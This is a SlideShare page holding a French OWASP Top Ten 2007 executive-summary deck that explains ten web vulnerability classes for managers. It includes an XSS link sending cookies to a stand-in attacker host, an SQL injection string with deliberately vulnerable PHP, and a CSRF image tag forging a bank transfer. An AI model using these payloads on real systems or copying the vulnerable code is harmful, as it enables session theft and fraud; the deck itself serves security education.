SlideShare una empresa de Scribd logo
1 de 18
Descargar para leer sin conexión
OWASP Top Ten 2007
                    Sommaire exécutif


                      Benoit Guerette, gueb@owasp.org
                      Montreal Chapter Leader
                      24 février 2009




OWASP
Education Project

                        Copyright 2007 © The OWASP Foundation
                        Permission is granted to copy, distribute and/or modify this document
                        under the terms of the OWASP License.




                        The OWASP Foundation
                        http://www.owasp.org
Remerciements
• Kate Hartmann, Directrices des Opérations, OWASP
• Membres du Board, OWASP Montreal




                                               OWASP   2
Rôle de l’OWASP

Organisme sans but lucratif
Communauté d’experts en sécurité
 applicative
Mission éducative, à l’aide de
 documents, outils et recommandations
100% libre (donc gratuit)
~130 chapitres à travers le monde, qui
 organisent des rencontres régulières, et
 des conférences

                                   OWASP    3
www.owasp.org




                OWASP   4
OWASP Top Ten 2007




                     www.owasp.org/index.php?title=Top_10_2007




                                              OWASP              5
OWASP Top Ten 2007

 Top Ten 2007 – Sommaire Exécutif
   Visuel & Exemples
   Pour que votre patron alloue du budget pour AppSec


 Référez-vous a OWASP.org pour + d’infos
   http://www.owasp.org/index.php/OWASP_Top_Ten_Project




                                                 OWASP     6
A1 – Cross Site Scripting (XSS)
   Condition #1 -> Le site affiche une donnée provenant d’un paramètre




   Condition #2 -> La donnée n’est pas validée




                                                                   OWASP   7
A1 – Cross Site Scripting (XSS)




                                  OWASP   8
A1 – Cross Site Scripting (XSS)



 Bonjour Joe! J'ai acheté un excellent nouveau livre,
 logge toi sur SuperLivre.com et va voir mon commentaire:

 http://www.superlivre.com/commentaires.php?
 comment=<script>http://myevilsite.ru/
 grab.cgi?'%20+document.cookie</script>




                                                                            Site vulnérable, affiche intégralement
                                                                            le contenu d’un paramètre



             http://myevilsite.ru

             • Obtention du cookie de Joe (Vol de cookie est le plus populaire des XSS)
             • Achat de livres avec le compte de Joe

EXEMPLE: 16 décembre 2008 - American Express web bug exposes card holders

                                                                                          OWASP                9
A2 – Injection Flaws
L’Injection SQL est très populaire. Ne jamais prendre directement le
contenu d’une donnée dans un SQL:
PHP: $sql = "SELECT * FROM users WHERE id = '" . $_REQUEST['id'] . "' and pass = '" . $_REQUEST['password'] . "';




PHP: $sql = "SELECT * FROM users WHERE id = 'John' and ……..




PHP: $sql = "SELECT * FROM users WHERE id = '' or 1=1;--' and …..




 EXEMPLE: 13 Janvier 2006 – Un hacker russe vole 53,000
 # de cartes de crédits au gouvernement du Rhode Island
                                                                                                OWASP               10
A3 – Malicious File Execution

                                    Le fichier d’image contient
                                    plutot un script php
                                    <?php
                                    Script PHP de l’attaquant
                                    ?>




       Un internaute visite le site -> Execution du script!!!


EXEMPLE: 2002 – Guess.com se fait voler 200,000 dossiers clients,
incluant des # de cartes de crédit
                                                                  OWASP   11
A4 – Insecure Direct Object Reference

          http://www.MaBanque.com/Interface?id=471249




                                        Numéro de compte réel




 EXEMPLE: 2000 – Un internaute récupere 17,000 dossiers de
 compagnies en modifiant le # de compte dans le URL d’un bureau de
 taxation Australien


                                                        OWASP        12
A5 – Cross Site Request Forgery (CSRF/XSRF)
La victime ne voit pas qu’elle viens d’exécuter une action

#1 Usager se connecte à sa banque




#2 Visite du forum contenant la requète forgée

                                                                    Requète forgée vulnérable


                    <img src=http://www.MaBanque.com/transfer?to_account=87453&amount=1000/>




                      #3 Execution du script!!!

EXEMPLE:
Site d’enchère populaire, le lien caché effectuait un ‘BID’ pour chaque visiteur de la page
authentifié sur le site
                                                                                     OWASP      13
A6 – Information Leakage and Improper Error
Handling
 N’aidez pas un attaquant à vous faire du mal




                                                 OWASP   14
A7 – Broken Authentification and Session
Management
 Aucune politique de mots de passe
 Aucune limite de login infructueux
 -> Brute Force Password Guessing




                                                      Dictionnaire de
                                                      mots de passes




EXEMPLE: 7 janvier 2009, accès à des comptes administrateurs sur www.twitter.com

                                                                 OWASP        15
A8 – Insecure Cryptographic Storage
                              TABLE: USAGER
                            CHAMP: MOTDEPASSE

                            * Utilisation d’un hash non sécure (MD4)



         Transaction.java


   * clé privée dans le code                         TABLE: TRANSACTION
                                                   CHAMP: NUM_CARTE_CREDIT

                                                 * numéro de carte en clair


  * clé privée accessible par
       tous sur le disque
                               Base de données


           secure.key                         * clé privée dans la base de données

                                                   TABLE: CRYPT
                                                 CHAMP: CLE_ACTIVE




EXEMPLE: 2006, TJX - Vol de 45 millions de # numéros de carte de crédits

                                                                                     OWASP   16
A9 – Insecure Communications
Protégez les données sensibles!




                   access_log (fichier de log du serveur web )
               … username =codeusager &password=motdepasse


 Serveur Web




                                                                 OWASP   17
A10 – Failure to Restrict URL Access

Cacher l’existence d’une page, en pensant
 que personne ne la trouvera, n’est pas une
 sécurité viable.
   http://www.exemple.com/admin/adduser.php
   http://www.exemple.com/siteadmin.pl
   http://www.exemple.com/approveTransfer.do


Calculer des privilèges d’accès dans le
 fureteur et non sur le serveur
   EXEMPLE: 11 Janvier 2007,
    Vulnérabilité dans le site d’enregistrement au MacWorld
    , permettant l’obtention d’une passe platinum gratuite
    (valeur de 1700$)

                                                 OWASP        18

Más contenido relacionado

La actualidad más candente

Développement Web - HTML5, CSS3, APIs Web
Développement Web - HTML5, CSS3, APIs WebDéveloppement Web - HTML5, CSS3, APIs Web
Développement Web - HTML5, CSS3, APIs WebYoann Gotthilf
 
Application web php5 html5 css3 bootstrap
Application web php5 html5 css3 bootstrapApplication web php5 html5 css3 bootstrap
Application web php5 html5 css3 bootstrapBassem ABCHA
 
Sécuriser un site Wordpress
Sécuriser un site WordpressSécuriser un site Wordpress
Sécuriser un site Wordpressbestyuna
 
MongoDB day Paris 2012
MongoDB day Paris 2012MongoDB day Paris 2012
MongoDB day Paris 2012FastConnect
 
Cours php & Mysql - 5éme partie
Cours php & Mysql - 5éme partieCours php & Mysql - 5éme partie
Cours php & Mysql - 5éme partiekadzaki
 
Sécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webSécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webIZZA Samir
 
La sécurite pour les developpeurs - OWF
La sécurite pour les developpeurs - OWFLa sécurite pour les developpeurs - OWF
La sécurite pour les developpeurs - OWFChristophe Villeneuve
 
Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)
Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)
Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)Julien Deneuville
 
Pots de Miel, Honeypot informatique - Sécurité informatique
Pots de Miel, Honeypot informatique - Sécurité informatiquePots de Miel, Honeypot informatique - Sécurité informatique
Pots de Miel, Honeypot informatique - Sécurité informatique🏁 Pierre-Henry Soria 💡
 

La actualidad más candente (11)

Développement Web - HTML5, CSS3, APIs Web
Développement Web - HTML5, CSS3, APIs WebDéveloppement Web - HTML5, CSS3, APIs Web
Développement Web - HTML5, CSS3, APIs Web
 
Application web php5 html5 css3 bootstrap
Application web php5 html5 css3 bootstrapApplication web php5 html5 css3 bootstrap
Application web php5 html5 css3 bootstrap
 
Sécuriser un site Wordpress
Sécuriser un site WordpressSécuriser un site Wordpress
Sécuriser un site Wordpress
 
MongoDB day Paris 2012
MongoDB day Paris 2012MongoDB day Paris 2012
MongoDB day Paris 2012
 
Cours php & Mysql - 5éme partie
Cours php & Mysql - 5éme partieCours php & Mysql - 5éme partie
Cours php & Mysql - 5éme partie
 
Php & My Sql
Php & My SqlPhp & My Sql
Php & My Sql
 
Sécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du webSécuriser un site WordPress - Semaine du web
Sécuriser un site WordPress - Semaine du web
 
La sécurite pour les developpeurs - OWF
La sécurite pour les developpeurs - OWFLa sécurite pour les developpeurs - OWF
La sécurite pour les developpeurs - OWF
 
Intro mongodb
Intro mongodbIntro mongodb
Intro mongodb
 
Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)
Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)
Netlinking : de vraies solutions pour 2014 (Meetup SEO France du 15/01/14)
 
Pots de Miel, Honeypot informatique - Sécurité informatique
Pots de Miel, Honeypot informatique - Sécurité informatiquePots de Miel, Honeypot informatique - Sécurité informatique
Pots de Miel, Honeypot informatique - Sécurité informatique
 

Destacado

2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)Sébastien GIORIA
 
OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013Sébastien GIORIA
 
OWASP Mobile Top10 - Les 10 risques sur les mobiles
OWASP Mobile Top10 -  Les 10 risques sur les mobilesOWASP Mobile Top10 -  Les 10 risques sur les mobiles
OWASP Mobile Top10 - Les 10 risques sur les mobilesSébastien GIORIA
 
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014Sébastien GIORIA
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
 
Teaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakTeaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakShelly Sanchez Terrell
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerLuminary Labs
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsLinkedIn
 

Destacado (8)

2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
2013 02-12-owasp top10 mobile - attaques et solutions sur windows phone (sec309)
 
OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013OWASP Top10 2013 - Présentation aux RSSIA 2013
OWASP Top10 2013 - Présentation aux RSSIA 2013
 
OWASP Mobile Top10 - Les 10 risques sur les mobiles
OWASP Mobile Top10 -  Les 10 risques sur les mobilesOWASP Mobile Top10 -  Les 10 risques sur les mobiles
OWASP Mobile Top10 - Les 10 risques sur les mobiles
 
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
Teaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & TextspeakTeaching Students with Emojis, Emoticons, & Textspeak
Teaching Students with Emojis, Emoticons, & Textspeak
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI Explainer
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving Cars
 

Similar a OWASP Top Ten 2007 - Sommaire executif - French version

Epitech securite-2012.key
Epitech securite-2012.keyEpitech securite-2012.key
Epitech securite-2012.keyDamien Seguy
 
Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02Asma Messaoudi
 
Durcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebDurcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebCyrille Grandval
 
Owasp top 10 2010 Resist toulouse
Owasp top 10   2010  Resist toulouseOwasp top 10   2010  Resist toulouse
Owasp top 10 2010 Resist toulouseSébastien GIORIA
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseAntonio Fontes
 
2011 02-07-html5-security-v1
2011 02-07-html5-security-v12011 02-07-html5-security-v1
2011 02-07-html5-security-v1Sébastien GIORIA
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesBee_Ware
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeMarie Tapia
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité webdavystoffel
 
Techdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguerTechdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguerDamien Seguy
 
Sécurité des Applications WEB -LEVEL1
 Sécurité des Applications WEB-LEVEL1 Sécurité des Applications WEB-LEVEL1
Sécurité des Applications WEB -LEVEL1Tarek MOHAMED
 
DrupalCamp Lyon 2012 - Optimiser les performances Drupal depuis les tranchées
DrupalCamp Lyon 2012 -  Optimiser les performances Drupal depuis les tranchéesDrupalCamp Lyon 2012 -  Optimiser les performances Drupal depuis les tranchées
DrupalCamp Lyon 2012 - Optimiser les performances Drupal depuis les tranchéesAurelien Navarre
 
Les principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesLes principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesXavier Kress
 
Hacking Open source et Sécurité, préconisations
Hacking Open source et Sécurité, préconisationsHacking Open source et Sécurité, préconisations
Hacking Open source et Sécurité, préconisationsCertilience
 
Rapport DVWA: File Upload
Rapport DVWA: File UploadRapport DVWA: File Upload
Rapport DVWA: File UploadAyoub Rouzi
 
Introduction dans la Programmation Web Course 1
Introduction dans la Programmation Web Course 1Introduction dans la Programmation Web Course 1
Introduction dans la Programmation Web Course 1Vlad Posea
 

Similar a OWASP Top Ten 2007 - Sommaire executif - French version (20)

Epitech securite-2012.key
Epitech securite-2012.keyEpitech securite-2012.key
Epitech securite-2012.key
 
Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02Securitedesapplications 091011120426-phpapp02
Securitedesapplications 091011120426-phpapp02
 
Durcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative WebDurcissement de code - Sécurité Applicative Web
Durcissement de code - Sécurité Applicative Web
 
Securite web is_ima
Securite web is_imaSecurite web is_ima
Securite web is_ima
 
Owasp top 10 2010 Resist toulouse
Owasp top 10   2010  Resist toulouseOwasp top 10   2010  Resist toulouse
Owasp top 10 2010 Resist toulouse
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
 
2011 02-07-html5-security-v1
2011 02-07-html5-security-v12011 02-07-html5-security-v1
2011 02-07-html5-security-v1
 
Les principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuellesLes principales failles de sécurité des applications web actuelles
Les principales failles de sécurité des applications web actuelles
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme Thémée
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité web
 
Techdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguerTechdays 2010 : comment hacker PHP sans se fatiguer
Techdays 2010 : comment hacker PHP sans se fatiguer
 
Rmll.securite
Rmll.securiteRmll.securite
Rmll.securite
 
Sécurité des Applications WEB -LEVEL1
 Sécurité des Applications WEB-LEVEL1 Sécurité des Applications WEB-LEVEL1
Sécurité des Applications WEB -LEVEL1
 
DrupalCamp Lyon 2012 - Optimiser les performances Drupal depuis les tranchées
DrupalCamp Lyon 2012 -  Optimiser les performances Drupal depuis les tranchéesDrupalCamp Lyon 2012 -  Optimiser les performances Drupal depuis les tranchées
DrupalCamp Lyon 2012 - Optimiser les performances Drupal depuis les tranchées
 
Les principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuellesLes principales failles de sécurité des applications Web actuelles
Les principales failles de sécurité des applications Web actuelles
 
20100114 Waf V0.7
20100114 Waf V0.720100114 Waf V0.7
20100114 Waf V0.7
 
La Sécurité Sur Le Web
La Sécurité Sur Le WebLa Sécurité Sur Le Web
La Sécurité Sur Le Web
 
Hacking Open source et Sécurité, préconisations
Hacking Open source et Sécurité, préconisationsHacking Open source et Sécurité, préconisations
Hacking Open source et Sécurité, préconisations
 
Rapport DVWA: File Upload
Rapport DVWA: File UploadRapport DVWA: File Upload
Rapport DVWA: File Upload
 
Introduction dans la Programmation Web Course 1
Introduction dans la Programmation Web Course 1Introduction dans la Programmation Web Course 1
Introduction dans la Programmation Web Course 1
 

OWASP Top Ten 2007 - Sommaire executif - French version

  • 1. OWASP Top Ten 2007 Sommaire exécutif Benoit Guerette, gueb@owasp.org Montreal Chapter Leader 24 février 2009 OWASP Education Project Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. Remerciements • Kate Hartmann, Directrices des Opérations, OWASP • Membres du Board, OWASP Montreal OWASP 2
  • 3. Rôle de l’OWASP Organisme sans but lucratif Communauté d’experts en sécurité applicative Mission éducative, à l’aide de documents, outils et recommandations 100% libre (donc gratuit) ~130 chapitres à travers le monde, qui organisent des rencontres régulières, et des conférences OWASP 3
  • 4. www.owasp.org OWASP 4
  • 5. OWASP Top Ten 2007 www.owasp.org/index.php?title=Top_10_2007 OWASP 5
  • 6. OWASP Top Ten 2007  Top Ten 2007 – Sommaire Exécutif  Visuel & Exemples  Pour que votre patron alloue du budget pour AppSec  Référez-vous a OWASP.org pour + d’infos  http://www.owasp.org/index.php/OWASP_Top_Ten_Project OWASP 6
  • 7. A1 – Cross Site Scripting (XSS)  Condition #1 -> Le site affiche une donnée provenant d’un paramètre  Condition #2 -> La donnée n’est pas validée OWASP 7
  • 8. A1 – Cross Site Scripting (XSS) OWASP 8
  • 9. A1 – Cross Site Scripting (XSS) Bonjour Joe! J'ai acheté un excellent nouveau livre, logge toi sur SuperLivre.com et va voir mon commentaire: http://www.superlivre.com/commentaires.php? comment=<script>http://myevilsite.ru/ grab.cgi?'%20+document.cookie</script> Site vulnérable, affiche intégralement le contenu d’un paramètre http://myevilsite.ru • Obtention du cookie de Joe (Vol de cookie est le plus populaire des XSS) • Achat de livres avec le compte de Joe EXEMPLE: 16 décembre 2008 - American Express web bug exposes card holders OWASP 9
  • 10. A2 – Injection Flaws L’Injection SQL est très populaire. Ne jamais prendre directement le contenu d’une donnée dans un SQL: PHP: $sql = "SELECT * FROM users WHERE id = '" . $_REQUEST['id'] . "' and pass = '" . $_REQUEST['password'] . "'; PHP: $sql = "SELECT * FROM users WHERE id = 'John' and …….. PHP: $sql = "SELECT * FROM users WHERE id = '' or 1=1;--' and ….. EXEMPLE: 13 Janvier 2006 – Un hacker russe vole 53,000 # de cartes de crédits au gouvernement du Rhode Island OWASP 10
  • 11. A3 – Malicious File Execution Le fichier d’image contient plutot un script php <?php Script PHP de l’attaquant ?> Un internaute visite le site -> Execution du script!!! EXEMPLE: 2002 – Guess.com se fait voler 200,000 dossiers clients, incluant des # de cartes de crédit OWASP 11
  • 12. A4 – Insecure Direct Object Reference http://www.MaBanque.com/Interface?id=471249 Numéro de compte réel EXEMPLE: 2000 – Un internaute récupere 17,000 dossiers de compagnies en modifiant le # de compte dans le URL d’un bureau de taxation Australien OWASP 12
  • 13. A5 – Cross Site Request Forgery (CSRF/XSRF) La victime ne voit pas qu’elle viens d’exécuter une action #1 Usager se connecte à sa banque #2 Visite du forum contenant la requète forgée Requète forgée vulnérable <img src=http://www.MaBanque.com/transfer?to_account=87453&amount=1000/> #3 Execution du script!!! EXEMPLE: Site d’enchère populaire, le lien caché effectuait un ‘BID’ pour chaque visiteur de la page authentifié sur le site OWASP 13
  • 14. A6 – Information Leakage and Improper Error Handling  N’aidez pas un attaquant à vous faire du mal OWASP 14
  • 15. A7 – Broken Authentification and Session Management  Aucune politique de mots de passe  Aucune limite de login infructueux  -> Brute Force Password Guessing Dictionnaire de mots de passes EXEMPLE: 7 janvier 2009, accès à des comptes administrateurs sur www.twitter.com OWASP 15
  • 16. A8 – Insecure Cryptographic Storage TABLE: USAGER CHAMP: MOTDEPASSE * Utilisation d’un hash non sécure (MD4) Transaction.java * clé privée dans le code TABLE: TRANSACTION CHAMP: NUM_CARTE_CREDIT * numéro de carte en clair * clé privée accessible par tous sur le disque Base de données secure.key * clé privée dans la base de données TABLE: CRYPT CHAMP: CLE_ACTIVE EXEMPLE: 2006, TJX - Vol de 45 millions de # numéros de carte de crédits OWASP 16
  • 17. A9 – Insecure Communications Protégez les données sensibles! access_log (fichier de log du serveur web ) … username =codeusager &password=motdepasse Serveur Web OWASP 17
  • 18. A10 – Failure to Restrict URL Access Cacher l’existence d’une page, en pensant que personne ne la trouvera, n’est pas une sécurité viable.  http://www.exemple.com/admin/adduser.php  http://www.exemple.com/siteadmin.pl  http://www.exemple.com/approveTransfer.do Calculer des privilèges d’accès dans le fureteur et non sur le serveur  EXEMPLE: 11 Janvier 2007, Vulnérabilité dans le site d’enregistrement au MacWorld , permettant l’obtention d’une passe platinum gratuite (valeur de 1700$) OWASP 18